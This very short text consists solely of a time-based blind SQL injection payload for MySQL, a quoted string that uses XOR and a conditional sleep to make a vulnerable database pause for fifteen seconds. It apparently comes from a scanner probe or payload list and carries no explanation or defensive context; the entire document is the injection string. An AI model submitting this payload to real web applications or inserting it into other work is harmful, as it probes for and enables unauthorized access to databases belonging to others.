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941020'XOR(94102*if(now()=sysdate(),sleep(15),0))XOR'Z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